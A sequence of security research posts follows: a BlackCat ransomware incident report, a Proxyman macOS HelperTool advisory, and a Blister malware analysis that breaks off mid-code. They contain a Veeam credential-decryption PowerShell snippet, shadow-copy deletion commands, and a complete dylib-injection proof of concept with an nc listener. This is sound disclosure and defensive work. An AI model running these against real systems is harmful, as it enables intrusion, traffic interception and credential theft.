 $SqlServerName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlServerName
} catch {
 echo "Can't find Veeam on localhost, try running as Administrator"
 exit -1
}

""
"Found Veeam DB on " + $SqlServerName + "\" + $SqlInstanceName + "@

{
 $EnryptedPWD = [Convert]::FromBase64String($_.password)
 $ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
 $enc = [system.text.encoding]::Default
 $_.password = $enc.GetString($ClearPWD)
}

Additionally, the threat actor used ScreenConnect to transfer Mimikatz to a compromised host (see below).  

{"EventData":{"Data":"Transferred files with action 'Transfer':\nmimikatz.exe\n\nVersion: 23.4.5.8571\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (7d2615d1049a2b63)\\ScreenConnect.ClientService.exe\n","Binary":""}} 

Events like the above and any others related to ScreenConnect activity can be found in Application.evtx.  

Subsequently, evidence of a file named mimikatz.log was observed. It is highly likely Mimikatz was leveraged by the threat actor to harvest credentials.  

Finally, it is likely the threat actor enumerated C:\Windows\NTDS\ntds.dit, as the following files were created: 1.txt.ntds, 1.txt.ntds.kerberos and 1.txt.ntds.cleartext. These files are consistent with the use of Impacket [5].

Discovery 

The threat actor used ScreenConnect to execute commands such as ping <HOST NAME>.<DOMAIN NAME>.local. In some instances the commands executed were not specified (see below), but a recorded command length of 33 can indicate that commands were executed manually.

{"EventData":{"Data":"Executed command of length: 33\n\nVersion: 23.4.5.8571\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (1b70ca7b560918ec)\\ScreenConnect.ClientService.exe\n","Binary":""}} 

At the same time on another host, net.exe and net1.exe were executed. As net is often used by threat actors to gather system and network information, it is possible ScreenConnect was used to gather this type of information.   

Analysis of the ransomware executable min.exe found that the UUID was obtained using: wmic csproduct get UUID. 

Lateral Movement 

The threat actor executed PsExec.exe. BlackCat has been known to use PsExec to replicate itself across connected servers [6].  

Collection 

Data staging was conducted by the threat actor as multiple .zip files were created that are believed to have been exfiltrated.  

Additionally, one of the accounts compromised by the threat actor executed WinRAR. Across the time period of interest, folders on multiple drives were modified; the threat actor potentially accessed these folders.  

Command and Control 

Remote access applications, particularly ScreenConnect, were heavily utilised by the threat actor. ScreenConnect was used to start remote sessions, execute commands and transfer files. The threat actor transferred the following files: mimikatz.exe, MEGAsyncSetup64.exe, tsd-setup.exe, 121.msi* and 212.msi*.  

*Note: Could not be recovered for analysis.   

Atera and Splashtop were also observed: 

  • c:\program files (x86)\atera networks\ateraagent\ateraagent.exe. 
  • Services: AteraAgent and WinRing0_1_2_0  
  • C:\Windows\Temp\SplashtopStreamer.exe

Atera is used for remote monitoring and management and the Atera Agent is required for hosts to be monitored. It is likely Atera was used for persistence.  

Splashtop allows hosts to be remotely accessed and was likely used for persistence especially as the Splashtop® Remote Service was observed going online. Splashtop events are also located in Application.evtx.  

Exfiltration 

Data staging was observed as a technique used by the threat actor. Multiple .zip files were created at the same time within C:\PerfLogs. It is believed these .zip files were exfiltrated.  

For one of the compromised accounts, WinRAR was observed at C:\Users\<USER>\Desktop\winrar-x64-621.exe. It is possible this utility was used for data exfiltration.

MEGAsync is a legitimate cloud storage solution, however, it is often used by threat actors for exfiltrating data. Due to its presence in the victim’s environment, it is highly likely the threat actor used MEGA to exfiltrate data.  

MEGA was observed to have resided in the following locations:

  • C:\Users\<User>\AppData\Local\MEGAsync\MEGAsync.exe 
  • C:\Users\<User>\Documents\ConnectWiseControl\Files\MEGAsyncSetup64.exe 
  • C:\Users\<User>\Downloads\MEGAsyncSetup64.exe

Additionally, MEGA-related strings were recovered from the encrypted VMDKs: 

  • MEGAsyncSetup64.exe 
  • MEGAsync.exe 
  • MEGA Website.lnk 
  • MEGAsync.cfg.bak 
  • MEGAsync.log 
  • MEGAsync Update Task [SID] 
  • MEGAsync.lnk

Impact 

BlackCat ransomware was deployed to the affected domain in the form of min.exe. Data was encrypted and .dujcsfd was appended to files. A ransom note was dropped onto the compromised Windows servers.  

min.exe 

PsExec was highly likely used to distribute the ransomware across the affected domain as BlackCat has a built-in PsExec module [7].  

Additionally, min.exe had the following command line options: 

  • access-token: Access token. 
  • paths: Only process files inside defined paths 
  • no-net: Do not discover network shares on Windows. 
  • no-prop : Do not self propagate (worm) on Windows. 
  • no-wall: Do not update desktop wallpaper on Windows. 
  • no-impers: Do not spawn impersonated processes on Windows. 
  • no-vm-kill: Do not stop VMs on ESXi. 
  • no-vm-snapshot-kill: Do not wipe VM snapshots on ESXi. 
  • no-vm-kill-names: Do not stop defined VMs on ESXi. 
  • sleep-restart: Sleep for duration in seconds after successful run and then restart. 
  • sleep-restart-duration: Keep soft persistence alive for duration in seconds (24 hours by default). 
  • sleep-restart-until: Keep soft persistence alive until defined UTC time in millis (defaults to 24 hours since launch). 
  • no-prop-servers: Do not propagate to defined servers. 
  • prop-file: Propagate specified file. 
  • drop-drag-and-drop-target: Drop drag and drop target batch file. 
  • drag-and-drop: Invoked with drag and drop. 
  • log-file: Enable logging to specified file. 
  • verbose: Log to console. 
  • extra-verbose: Log more to console.  
  • ui: Show user interface. 
  • safeboot: Reboot in Safe Mode before running on Windows. 
  • safeboot-network: Reboot in Safe Mode with Networking before running on Windows. 
  • safeboot-instance: Run as safeboot instance on Windows. 
  • propagated: Run as propagated process. 
  • child: Run as child process.  
  • bypass: Run as elevated process.  

The configuration of min.exe contained 23 elements [8]: 

  • config_id: Configuration ID 
  • extension: File extension appended to files.  
  • public_key: RSA public key. 
  • note_file_name: The file name of the ransom note.  
  • note_full_text: The ransom note in full.  
  • note_short_text: A shorter version of the ransom note.  
  • Credentials: Credentials used by BlackCat. 
  • default_file_mode: File encryption mode.  
  • default_file_cipher: File encryption cipher.  
  • kill_services: The services to terminate.  
  • kill_processes: The processes to terminate.  
  • exclude_directory_names: Does not encrypt the defined directories.   
  • exclude_file_names: Does not encrypt the defined files. 
  • exclude_file_extensions: Does not encrypt the defined extensions.  
  • exclude_file_path_wildcard: Does not encrypt the defined file paths.  
  • enable_network_discovery: Enable network discovery. 
  • enable_self_propagation: Enable self propagation.  
  • enable_set_wallpaper: Enable the desktop wallpaper to be changed.
  • enable_esxi_vm_kill: Enable VM termination on ESXi. 
  • enable_esxi_vm_snapshot_kill: Enable snapshot deletion on ESXi. 
  • strict_include_paths: Hardcoded file paths to encrypt. 
  • esxi_vm_kill_exclude: VMs to exclude from termination on ESXi hosts. 
  • sleep_restart: Sleep time before restarting.

Some of the directories excluded from encryption include:

  • $windows.~bt 
  • windows 
  • windows.old 
  • system volume information 
  • boot 

The files below are some of the files included in the file name exclusion list: 

  • ntuser.dat 
  • autorun.inf 
  • boot.ini 
  • desktop.ini 

Below are some of the defined extensions that are not encrypted: 

  • exe 
  • drv 
  • msc 
  • dll 
  • lock 
  • sys 
  • msu 
  • lnk

T1489 – Service Stop [9] 

min.exe uses kill_services to stop the following services:

  • memtas 
  • veeam 
  • svc$ 
  • backup 
  • sql 
  • vss 
  • msexchange 

Additionally, kill_processes is used to terminate various processes including but not limited to:

  • excel 
  • firefox 
  • infopath 
  • isqlplussvc 
  • msaccess 
  • mspub 
  • mydesktopqos 
  • mydesktopservice 
  • notepad 
  • ocautoupds
  • ocomm 
  • ocssd 
  • onenote 
  • oracle 
  • outlook
  • powerpnt 
  • sqbcoreservice 
  • steam 
  • synctime 
  • tbirdconfig
  • thebat 
  • thunderbird 
  • visio 
  • winword 
  • wordpad 
  • xfssvccon 

T1490 – Inhibit System Recovery 

Various backups were modified by the threat actor using an already existing domain administrator account and subsequently, backups were then deleted. 

Analysis of the ransomware executable, min.exe, indicated that BlackCat uses the below Windows utilities to inhibit system recovery: 

Windows Utility Description 
wmic.exe Shadowcopy Delete To delete shadow copies 
iisreset.exe /stop To stop all the running IIS services 
bcdedit /set recoveryenabled No To modify the boot configuration data 
vssadmin.exe Delete Shadows /all /quiet To delete all volume shadow copies 

T1491.001 – Defacement: Internal Defacement 

A desktop wallpaper, RECOVER-dujcsfd-FILES.txt.png, was dropped on some of the compromised Windows servers. 

Indicators of Compromise 

IOC Value Indicator Type Description  
7282dad776ad387028ae7b6d359b2d2d0b17af0e SHA1 C:\PerfLogs\min.exe (Ransomware executable) 
3E2272B916DA4BE3C120D17490423230AB62C174 SHA1 C:\PerfLogs\PsExec.exe 
DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA1 C:\PerfLogs\Veeam-Get-Creds.ps1 
C:\Users\<User>\Downloads\MEGAsyncSetup64.exe File Path MEGA 
C:\Program Files (x86)\ScreenConnect Client C:\Program Files (x86)\Splashtop C:\Program Files\ATERA Networks File Path Remote Access Applications 
C:\Users\<User>\Documents\ConnectWiseControl\Files\mimikatz.exe C:\Users\<User>\Documents\ConnectWiseControl\Files\MEGAsyncSetup64.exe C:\Users\<User>\Documents\ConnectWiseControl\Files\tsd-setup.exe File Path Files transferred using ScreenConnect.  

MITRE ATT&CK® 

Tactic Technique ID Description  
Execution  Windows Management Instrumentation T1047 WMIC.exe is used to delete shadow copies.  
Execution  System Services: Service Execution T1569.002 Various services installed.  
Persistence Create Account: Local Account T1136.001 Creation of new accounts.  
Persistence Create or Modify System Process: Windows Service T1543.003 Total Software Deployment installed as a new service.  
Defense Evasion Indicator Removal: Clear Windows Event Logs T1070.001 Cleared logs. Ransomware payload uses wevtutil.exe cl. 
Defense Evasion  Indicator Removal: File Deletion T1070.004 The ransomware executable was deleted.  
Defense Evasion Modify Registry T1112 Adding a registry key to maintain persistence.   
Defense Evasion File and Directory Permissions Modification: Windows File and Directory Permissions Modification T1222.001 Using fsutil to redirect file system access to a different location once access to the network is gained.  
Credential Access OS Credential Dumping T1003 Using a PowerShell script to retrieve Veeam credentials.  
Credential Access OS Credential Dumping: LSASS Memory T1003.001 Mimikatz. 
Credential Access OS Credential Dumping: NTDS T1003.003 Impacket usage to enumerate the NTDS.dit. 
Discovery Remote System Discovery T1018 Ping usage. 
Discovery System Owner/User Discovery T1033 Using ScreenConnect to execute commands. 
Discovery System Information Discovery T1082 Obtain the UUID. 
Lateral Movement  Lateral Tool Transfer T1570 Execution PsExec to move laterally. 
Collection Data Staged: Local Data Staging T1074.001 Creation of multiple .zip files. 
Collection Archive Collected Data: Archive via Utility T1560.001 Observation of WinRAR. 
Command and Control Remote Access Software T1219 Presence of ScreenConnect, Atera and Splashtop 
Exfiltration  Data Staged: Local Data Staging T1074.001 Multiple .zip files within C:\PerfLogs. 
Exfiltration Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Presence of MEGAsync.  
Impact  Data Encrypted for Impact T1486 Deployment of BlackCat ransomware.  
Impact Inhibit System Recovery T1490 Modification/deletion of backups.  Delete volume shadow copies. Stop running IIS services. Modify the boot configuration data. 
Impact Defacement: Internal Defacement T1491.001 RECOVER-dujcsfd-FILES.txt.png was dropped as desktop wallpaper. 

References 

[1] https://www.bleepingcomputer.com/news/security/new-donut-leaks-extortion-gang-linked-to-recent-ransomware-attacks/ 

[2] https://www.bleepingcomputer.com/news/security/donut-extortion-group-also-targets-victims-with-ransomware/

[3] https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/ 

[4] https://www.bleepingcomputer.com/news/security/alphv-blackcat-this-years-most-sophisticated-ransomware/ 

[5] https://twitter.com/MsftSecIntel/status/1692212191536066800 

[6] https://attack.mitre.org/software/S1068/  

[7] https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackcat  

[8] https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack 

[9] https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/ 

Technical Advisory: Insufficient Proxyman HelperTool XPC Validation

31 October 2023 at 20:03
Vendor: Proxyman LLC
Vendor URL: https://proxyman.io/
Versions affected: com.proxyman.NSProxy.HelperTool version 1.4.0 (distributed with Proxyman.app up to and including versions 4.11.0)
Systems Affected: macOS
Author: Scott Leitch
Advisory URL / CVE Identifier: CVE-2023-45732
Risk: Medium (Exploitation of this finding enables an attacker to redirect network traffic to an attacker-controlled location)

Summary

The com.proxyman.NSProxy.HelperTool application (version 1.4.0), a privileged helper tool distributed with the Proxyman application (up to and including version 4.10.1) for macOS 13 Ventura and earlier, allows a local attacker to use earlier versions of the Proxyman application to maliciously change the system proxy settings and redirect traffic to an attacker-controlled computer, facilitating man-in-the-middle (MITM) attacks or other passive network monitoring.

The affected Proxyman application is a macOS native desktop application used for HTTP(S) proxying. The application distribution includes a privileged helper tool (com.proxyman.NSProxy.HelperTool) that is used to adjust system proxy settings. The main application communicates with this higher-privilege tool over XPC.

Impact

It is possible for a low-privilege attacker or otherwise malicious process to inconspicuously change the operating system’s HTTP(S) proxy settings, facilitating, e.g., MITM attacks.

Recommendation

Update to the HelperTool version 1.5.0 or higher, distributed with the most recent (4.13.0 as of writing) version of Proxyman.

Details

Much of the below is based heavily on previous work by Csaba Fitzl, in particular his blog posts that coincided with earlier CVEs.

The HelperTool class implements the (BOOL)listener:(NSXPCListener *) shouldAcceptNewConnection:(NSXPCConnection *) instance method, which defines six code-signing requirement strings. A process attempting to establish a valid XPC connection to the installed com.proxyman.NSProxy.HelperTool must satisfy one of these requirements.

/* @class HelperTool */
-(char)listener:(void *)arg2 shouldAcceptNewConnection:(void *)arg3 {
    r14 = self;
    rax = [arg3 retain];
    r12 = rax;
    rdx = [rax processIdentifier];
    [r14 setConnectionPID:rdx];
    var_60 = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x8) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x10) = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x18) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x20) = @"anchor apple generic and identifier \"com.proxyman.NSProxy\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
    *( var_60 + 0x28) = @"anchor apple generic and identifier \"com.proxyman.NSProxy-setapp\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
    rax = [NSArray arrayWithObjects:rdx count:0x6];
    rax = [rax retain];
    r15 = rax;
    rcx = r12;
    if ([r14 validateIncomingConnectionForAllCodeSigns:rax forConnection:rcx] != 0x0) {
            rax = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol), rcx];
            rax = [rax retain];
            [r12 setExportedInterface:rax, rcx];
            [rax release];
            [r12 setExportedObject:r14, rcx];
            [r12 resume];
            r14 = 0x1;
    }

A de-compilation of the listener:shouldAcceptNewConnection: instance method defined six potential security requirements before passing them to the validateIncomingConnectionForAllCodeSigns:forConnection: instance method.

The above de-compilation shows the method grouping the six strings into an NSArray and passing them into the HelperTool‘s validateIncomingConnectionForAllCodeSigns:forConnection: instance method. This instance method loops through the six code-signing requirement strings, on each iteration calling, in succession, SecCodeCopyGuestWithAttributes(), SecRequirementCreateWithString(), and SecCodeCheckValidityWithErrors() to determine that the calling binary is correctly signed and conforms to one of the six allowed requirement strings.

An attacker able to pass the above security requirement check can communicate with the HelperTool, which is tasked with managing the system’s proxy settings through a series of XPC service methods. Modern distributions of the main Proxyman.app bundle are all signed with the hardened runtime flag, preventing the library injection attacks that would look to take advantage of this. However, an old version of Proxyman that is still available, version 1.3.4, is not signed with any code-signing flags, allowing an attacker to abuse it as a vector through which they can pass the above security validation check, communicate with an up-to-date HelperTool distributed with recent versions of Proxyman, and surreptitiously adjust system proxy settings.

$ codesign -dv /Volumes/Proxyman/Proxyman.app/Contents/MacOS/Proxyman
Executable=/Volumes/Proxyman/Proxyman.app/Contents/MacOS/Proxyman
Identifier=com.proxyman.NSProxy
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=17716 flags=0x0(none) hashes=546+5 location=embedded
Signature size=8916
Timestamp=Apr 1, 2019 at 1:19:02 AM
Info.plist entries=31
TeamIdentifier=3X57WP8E8V
Sealed Resources version=2 rules=13 files=266
Internal requirements count=1 size=212

An old version of the Proxyman (1.3.4) application was signed without flags to protect against library injections and also contained the requisite TeamIdentifier.
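The vulnerable property is visible in the codesign output above: flags=0x0(none) means neither the hardened runtime bit nor the library validation bit is set, so DYLD_INSERT_LIBRARIES injection is not blocked. As an illustrative helper (our own sketch, not part of the original advisory), the flags field of `codesign -dv` output can be checked like this, using the flag constants from the XNU kernel's cs_blobs.h:

```python
import re

# Code-signing flag bits from XNU's cs_blobs.h
CS_RUNTIME = 0x10000            # hardened runtime enabled
CS_LIBRARY_VALIDATION = 0x2000  # only Apple-/team-signed libraries may load

def injection_candidate(codesign_output: str) -> bool:
    """Return True if `codesign -dv` output shows no flags that would
    block DYLD_INSERT_LIBRARIES-style library injection."""
    m = re.search(r"flags=(0x[0-9a-fA-F]+)", codesign_output)
    if not m:
        return False
    flags = int(m.group(1), 16)
    return not (flags & (CS_RUNTIME | CS_LIBRARY_VALIDATION))

old_proxyman = "CodeDirectory v=20200 size=17716 flags=0x0(none) hashes=546+5"
hardened_app = "CodeDirectory v=20400 size=1234 flags=0x10000(runtime) hashes=10+5"
print(injection_candidate(old_proxyman))  # True: no protective flags
print(injection_candidate(hardened_app))  # False: hardened runtime set
```

In practice, the real check would run `codesign -dv` against the bundle's main executable and feed its stderr output to this parser.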

We can determine the exposed XPC service methods using the class-dump tool. Though there are several methods we appear to be able to communicate with, the simplest was legacySetProxySystemPreferencesWithAuthorization:(NSData *) enabled:(BOOL) host:(NSString *) port:(NSString *) reply:(void (^)(NSError *, BOOL)):

@protocol HelperToolProtocol
- (void)overrideProxySystemWithAuthorization:(NSData *)arg1 setting:(NSDictionary *)arg2 reply:(void (^)(NSError *))arg3;
- (void)revertProxySystemWithAuthorization:(NSData *)arg1 restore:(BOOL)arg2 reply:(void (^)(NSError *))arg3;
- (void)legacySetProxySystemPreferencesWithAuthorization:(NSData *)arg1 enabled:(BOOL)arg2 host:(NSString *)arg3 port:(NSString *)arg4 reply:(void (^)(NSError *, BOOL))arg5;
- (void)getVersionWithReply:(void (^)(NSString *))arg1;
- (void)connectWithEndpointReply:(void (^)(NSXPCListenerEndpoint *))arg1;
@end

XPC service methods exposed by the com.proxyman.NSProxy.HelperTool service

Using this, it’s possible to build a dynamic library that can be force-loaded into the old Proxyman application and that will, on startup, call the XPC service and set the system’s proxy settings to attacker-controlled values. Some important code snippets are included below, along with a full proof-of-concept source file.

@protocol HelperToolProtocol                                                        
- (void) legacySetProxySystemPreferencesWithAuthorization:(NSData *)auth_data       
    enabled:(BOOL)enabled host:(NSString *)host port:(NSString *)port               
    reply:(void (^)(NSError *, BOOL))reply;                                         
- (void) getVersionWithReply:(void (^)(NSString *))reply;                           
@end

The target HelperToolProtocol instance methods were included in the dynamic library.

    [obj legacySetProxySystemPreferencesWithAuthorization:authorization             
        enabled:enab                                                                
        host:host                                                                   
        port:port                                                                   
        reply:^(NSError * err, BOOL b) {                                            
            if (err != NULL) {                                                      
                NSLog(@"[!] Error: %@", err);                                       
                exit(1);                                                            
            } else {                                                                
                NSLog(@"[+] Proxy set successfully!");                               
            }                                                                       
        }                                                                           
    ];                                                                              

    [obj getVersionWithReply:^(NSString * reply) {                                  
        NSLog(@"[+] HelperTool Version: %@", reply);                                
    }];                                                                             

    [NSThread sleepForTimeInterval:0.5f];                                           
    NSLog(@"[+] Done.");

    while (1) {
        sleep(5);
    };

Once authorization checks were passed, the dynamic library called the legacySetProxySystemPreferencesWithAuthorization and getVersionWithReply instance methods.

Once we compile the dynamic library we can then insert it into the old Proxyman application:

clang -dynamiclib -x objective-c -framework Foundation -framework Security -o ProxyHelper_PoC.dylib ./ProxyHelper_PoC.m

And using the below shell script ($ ./PoC.sh ./ProxyHelper_PoC.dylib <host> <port>), it is possible to execute the proof-of-concept against a fully updated Proxyman installation, changing the system’s proxy settings:

#!/bin/sh
# Proxyman HelperTool PoC
VERSION="1.3.4"
FILENAME="Proxyman_$VERSION.dmg"
URL="https://github.com/ProxymanApp/Proxyman/releases/download/$VERSION/$FILENAME"
TMP_DIR=$(mktemp -d)
MNT="proxyman"
EXEC_PATH="$TMP_DIR/$MNT/Proxyman.app/Contents/MacOS/Proxyman"
DYLIB=$1
HOST=$2
PORT=$3

set -e

echo "[+] Changing to $TMP_DIR"
cp $DYLIB $TMP_DIR; cd $TMP_DIR; mkdir $MNT

echo "[+] Getting $URL..."
wget -q $URL

echo "[+] Mounting DMG..."
hdiutil attach $FILENAME -mountpoint $MNT \
    -nobrowse -noautoopen -quiet

echo "[+] Injecting dylib..."
DYLD_INSERT_LIBRARIES=$DYLIB $EXEC_PATH $HOST $PORT

The exploit script will retrieve the old version of Proxyman, mount it, and inject the compiled dynamic library into it, exploiting the already-installed and up-to-date HelperTool.

$ ./PoC.sh ProxyHelper_PoC.dylib 127.0.0.1 5555
[+] Changing to /var/folders/m5/h5w99qzx1zqdfj_bf8518h8w0000gn/T/
[+] Getting https://github.com/ProxymanApp/Proxyman/releases/download/1.3.4/Proxyman_1.3.4.dmg...
[+] Mounting DMG...
[+] Injecting dylib...
2023-08-31 16:46:38.856 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] obj: <__NSXPCInterfaceProxy_HelperToolProtocol: 0x600002364000>
2023-08-31 16:46:38.857 Proxyman[4504:166167] conn: <NSXPCConnection: 0x600003169e00> connection to service named com.proxyman.NSProxy.HelperTool
2023-08-31 16:46:38.956 Proxyman[4504:166202] [+] Proxy set successfully!
2023-08-31 16:46:38.957 Proxyman[4504:166202] [+] HelperTool Version: 1.4.0
2023-08-31 16:46:39.358 Proxyman[4504:166167] [+] Done.

The exploit succeeded, changing the system’s proxy settings to http(s)://127.0.0.1:5555

With the exploit proof-of-concept successful, it is possible to open an nc listener to catch requests being sent from browsers running on the system:

$ networksetup -getwebproxy Ethernet
Enabled: Yes
Server: 127.0.0.1
Port: 5555
Authenticated Proxy Enabled: 0
$ nc -nlvk 5555
CONNECT mesu.apple.com:443 HTTP/1.1
Host: mesu.apple.com
Proxy-Connection: keep-alive
Connection: keep-alive

CONNECT incoming.telemetry.mozilla.org:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Proxy-Connection: keep-alive
Connection: keep-alive
Host: incoming.telemetry.mozilla.org:443

With the proxy set, an nc listener on the selected port will catch requests from applications that adhere to the system proxy.

Popping Blisters for research: An overview of past payloads and exploring recent developments

1 November 2023 at 12:00

Summary

Blister is a piece of malware that loads a payload embedded inside it. We provide an overview of payloads dropped by the Blister loader based on 137 unpacked samples from the past one and a half years and take a look at recent activity of Blister. The overview shows that since its support for environmental keying, most samples have this feature enabled, indicating that attackers mostly use Blister in a targeted manner. Furthermore, there has been a shift in payload type from Cobalt Strike to Mythic agents, matching with previous reporting. Blister drops the same type of Mythic agent, which we thus far cannot link to any public Mythic agents. Another development is that its developers started obfuscating the first stage of Blister, making it more evasive. We provide YARA rules and scripts [1] to help analyze the Mythic agent and the packer we observed with it.

Recap of Blister

Blister is a loader that loads a payload embedded inside it and has in the past been observed in activity linked to Evil Corp [2,3]. Matching with public reporting, we have also seen it as a follow-up in SocGholish infections. In the past, we observed Blister mostly dropping Cobalt Strike beacons, yet current developments show a shift to Mythic agents, another red teaming framework.

Elastic Security first documented Blister in December 2021 in a campaign that used malicious installers [4]. It used valid code signatures referencing the company Blist LLC to pose as a legitimate executable, likely leading to the name Blister. That campaign reportedly dropped Cobalt Strike and BitRat.

In 2022, Blister moved to using only the x86-64 instruction set, where it previously also shipped 32-bit versions. Furthermore, RedCanary wrote about observing SocGholish dropping Blister [5], which was later confirmed by other vendors as well [6].

In August the same year, we observed a new version of Blister. This update included more configuration options, along with an optional domain hash for environmental keying, allowing attackers to deploy Blister in a targeted manner. Elastic Security recently wrote about this version [7].

2023 initially did not bring new developments for Blister. However, similar to its previous update, we observed development activity in August. Notably, we saw samples with added obfuscation to the first stage of Blister, i.e. the loader component that is injected into a legitimate executable. Additionally, in July, Unit 42 [8] observed SocGholish dropping Blister with a Mythic agent.

In summary, 2023 brought new developments for Blister, with added obfuscations to the first stage and a new type of payload. The remainder of this blog is divided into two parts: first, we look back at previous Blister payloads and configurations; second, we discuss the recent developments.

Looking back at Blister

In early 2023, we observed a SocGholish infection at our security operations center (SOC). We notified the customer and were given a binary that was related to the infection. This turned out to be a Blister sample, with Cobalt Strike as its payload.

We wrote an extractor that worked on the sample encountered at the SOC, but for certain other Blister samples it did not. It turned out that the sample from the SOC investigation belonged to a version of Blister that was introduced in August 2022, while older samples had a different configuration. After writing an extractor for these older versions, we made an overview of what Blister had been dropping in roughly the past two years.

The samples we analyzed are all available on VirusTotal, the platform we used to find samples. We focus on 64-bit Blister samples; as far as we know, newer samples no longer use 32-bit. In total, we found 137 samples we could unpack: 33 samples of the older version and 104 samples of the newer version from 2022.

In the Appendix, we list these samples, where version 1 and 2 refer to the old and new version respectively. The table is sorted on the first seen date of a sample in VirusTotal, where you clearly see the introduction of the update.

Because we want to keep the tables comprehensible, we have split up the data into four tables. For now, it is important to note that Table 2 provides information per Blister sample we unpacked, including the date it was first uploaded to VirusTotal, the version, the label of the payload it drops, the type of payload, and two configuration flags. Furthermore, to have a list of Blister and payload hashes in clear text in the blog, we included these in Table 6. We also included a more complete data set at https://github.com/fox-it/blister-research.

Discussing payloads

Looking at the dropped payloads, we see that it mostly conforms with what has already been reported. In Figure 1, we provide a timeline based on the first seen date of a sample in VirusTotal and the family of the payload. The observed payloads consist of Cobalt Strike, Mythic, Putty, and a test application. Initially, Blister dropped various flavors of Cobalt Strike and later dropped a Mythic agent, which we refer to as BlisterMythic. Recently, we also observed a packer that unpacks BlisterMythic, which we refer to as MythicPacker. Interestingly, we did not observe any samples drop BitRat.

Figure 1, Overview of Blister samples we were able to unpack, based on the first seen date reported in VirusTotal.

From the 137 samples, we were able to retrieve 74 unique payloads. This discrepancy between the number of unique Blister samples and unique payloads is mainly caused by various Blister samples dropping the same Putty or test application, namely 18 and 22 samples, respectively. This summer has shown a particular increase in test payloads.

Cobalt Strike

Cobalt Strike was dropped through three different types of payloads: generic shellcode, DLL stagers, or obfuscated shellcode. In total, we retrieved 61 beacons; in Table 1 we list the Cobalt Strike watermarks we observed. A watermark is a unique value linked to a license key. It should be noted that Cobalt Strike watermarks can be changed and hence are not a sound way to identify clusters of activity.

Watermark (decimal) | Watermark (hexadecimal) | Nr. of beacons
206546002 | 0xc4fa452 | 2
1580103824 | 0x5e2e7890 | 21
1101991775 | 0x41af0f5f | 38
Table 1, Counted Cobalt Strike watermarks observed in beacons dropped by Blister.

The watermark 206546002, though only used twice, shows up in other reports as well, e.g. a report on an Emotet intrusion [9] and reports linking it to Royal, Quantum, and Play ransomware activity [10,11]. The watermark 1580103824 is mentioned in reports on Gootloader [12], but also Cl0p [13], and is the 9th most common beacon watermark based on our dataset of Cobalt Strike beacons [14]. Interestingly, 1101991775, the most common watermark in our set, is not mentioned in public reporting as far as we can tell.

Cobalt Strike profile generators

In Table 3, we list information on the extracted beacons, including the submission path. Most of the submission paths contain /safebrowsing/ and /rest/2/meetings, matching with paths found in SourcePoint [15], a Cobalt Strike command-and-control (C2) profile generator. This only holds, however, for the regular shellcode beacons; when we look at the obfuscated shellcode and the DLL stager beacons, they seem to use a different C2 profile. The C2 profiles for these payloads match with another public C2 profile generator [16].

Domain fronting

Some of the beacons are configured to use “domain fronting”, a technique that allows malicious actors to hide the true destination of their network traffic and evade detection by security systems. It involves routing malicious traffic through a content delivery network (CDN) or other intermediary server, making it appear as if the traffic is going to a legitimate or benign domain while, in reality, it is communicating with a malicious C2 server.

Certain beacons have subdomains of fastly[.]net as their C2 server, e.g. backend.int.global.prod.fastly[.]net or python.docs.global.prod.fastly[.]net. However, the domains they connect to are admin.reddit[.]com or admin.wikihow[.]com, which are legitimate domains hosted on a CDN.
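The mechanic can be illustrated with a short sketch (conceptual; not code extracted from the beacons, though the hostnames are the ones observed above). The outer TCP/TLS connection targets the benign, CDN-hosted name, while the inner HTTP Host header names the fastly[.]net service that routes the request onward to the C2 server:

```python
def fronted_request(backend_host: str, path: str = "/safebrowsing/") -> bytes:
    """Build the inner HTTP request of a domain-fronted beacon check-in.

    The outer TCP/TLS connection (and SNI) would target a benign name
    such as admin.reddit[.]com, while this Host header names the CDN
    service that actually forwards traffic to the C2 server.
    """
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {backend_host}\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
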